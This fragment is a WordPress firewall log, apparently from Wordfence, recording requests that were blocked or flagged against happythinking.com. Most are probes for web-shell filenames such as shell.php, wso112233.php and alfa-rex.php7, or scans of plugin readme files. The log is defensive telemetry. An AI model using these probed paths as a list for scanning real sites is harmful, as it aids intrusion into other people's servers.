(50594, 1711720272.571457, 1711720272.213100, '\0\0\0\0\0\0\0\0\0\0ÿÿ^œ@', 0, 403, 0, 0, 0, 'https://happythinking.com/images/about.php?520=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2ltYWdlcy9hYm91dC5waHA=","category":"brute-force","ssl":1}'),
(50572, 1711655694.378027, 1711655693.825600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/wp-content/admin.php?520=', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvYWRtaW4ucGhw","category":"brute-force","ssl":1}'),
(50527, 1711401260.101360, 1711401259.110800, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/themes/classic/inc/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2NsYXNzaWMvaW5jL2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(50526, 1711401262.767396, 1711401262.086400, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/themes/classic/inc/RxRazdgv.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2NsYXNzaWMvaW5jL1J4UmF6ZGd2LnBocA==","category":"brute-force","ssl":1}'),
(50676, 1711731869.534669, 1711731869.217600, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///alfa-rex.php7', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vYWxmYS1yZXgucGhwNw==","category":"brute-force","ssl":1}'),
(50677, 1711738147.268079, 1711738146.875200, '\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4x', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50693, 1711808327.082148, 1711808326.731300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/inc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luYy5waHA=","category":"brute-force","ssl":1}'),
(51714, 1712368121.914571, 1712368121.572200, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/super-forms/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 10; SM-G973F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36 EdgA/120.0.2210.141', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlci1mb3Jtcy9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlci1mb3Jtcy9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51921, 1712636728.376713, 1712636728.029000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/seo.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3Nlby5waHA=","category":"brute-force","ssl":1}'),
(50925, 1712082479.986191, 1712082479.374800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/moon.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21vb24ucGhw","category":"brute-force","ssl":1}'),
(50919, 1712082516.186102, 1712082515.129700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/ws.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzLnBocA==","category":"brute-force","ssl":1}'),
(50920, 1712082512.129306, 1712082511.524200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/shell.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NoZWxsLnBocA==","category":"brute-force","ssl":1}'),
(50928, 1712082455.525588, 1712082454.954900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/plugins.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3BsdWdpbnMucGhw","category":"brute-force","ssl":1}'),
(51725, 1712368240.339713, 1712368239.847300, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/page-flip-image-gallery/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 10; YAL-L21; HMSCore 6.13.0.302; GMSCore 24.02.13) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.88 HuaweiBrowser/14.0.2.311 Mobile Safari/537.3', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWdlLWZsaXAtaW1hZ2UtZ2FsbGVyeS9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWdlLWZsaXAtaW1hZ2UtZ2FsbGVyeS9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(50909, 1712082580.899194, 1712082580.313600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/mini.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21pbmkucGhw","category":"brute-force","ssl":1}'),
(50624, 1711731956.197872, 1711731955.758500, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-content/dropdown.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtY29udGVudC9kcm9wZG93bi5waHA=","category":"brute-force","ssl":1}'),
(50626, 1711731952.946657, 1711731952.559900, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wso112233.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3NvMTEyMjMzLnBocA==","category":"brute-force","ssl":1}'),
(50622, 1711731959.327445, 1711731958.992400, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-admin/dropdown.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtYWRtaW4vZHJvcGRvd24ucGhw","category":"brute-force","ssl":1}'),
(50619, 1711731967.703715, 1711731967.321700, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-content/themes/seotheme/mar.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtY29udGVudC90aGVtZXMvc2VvdGhlbWUvbWFyLnBocA==","category":"brute-force","ssl":1}'),
(50832, 1712011462.928690, 1712011462.457900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/dummyyummy/wp-signup.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9kdW1teXl1bW15L3dwLXNpZ251cC5waHA=","category":"brute-force","ssl":1}'),
(50813, 1712000535.790538, 1712000535.285600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/themes.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3RoZW1lcy5waHA=","category":"brute-force","ssl":1}'),
(50620, 1711731966.416992, 1711731966.004000, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-content/plugins/seoplugins/mar.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtY29udGVudC9wbHVnaW5zL3Nlb3BsdWdpbnMvbWFyLnBocA==","category":"brute-force","ssl":1}'),
(50618, 1711731969.506371, 1711731969.037400, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///images/mar.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vaW1hZ2VzL21hci5waHA=","category":"brute-force","ssl":1}'),
(50586, 0.000000, 1711678602.854030, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹ÙÅ…', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Apache-HttpClient/4.5.13 (Java/11.0.22)', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50587, 1711678606.412067, 1711678605.871800, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹ÙÅ…', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', 'https://www.google.com', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3dwLWxvZ2luLnBocA=="}'),
(50575, 1711655614.124332, 1711655613.466800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/about.php?520=', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Fib3V0LnBocA==","category":"brute-force","ssl":1}'),
(50518, 1711401287.845686, 1711401286.892500, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/core-stab/RxRiafps.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXN0YWIvUnhSaWFmcHMucGhw","category":"brute-force","ssl":1}'),
(50510, 1711394442.745374, 1711394442.305400, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/web/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dlYi93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L3dlYi93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
(50604, 1711731995.958436, 1711731995.606100, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///ccx/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vY2N4L2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(50629, 1711731946.856010, 1711731946.416000, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-admin/includes/xmrlpc.php?p=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtYWRtaW4vaW5jbHVkZXMveG1ybHBjLnBocA==","category":"brute-force","ssl":1}'),
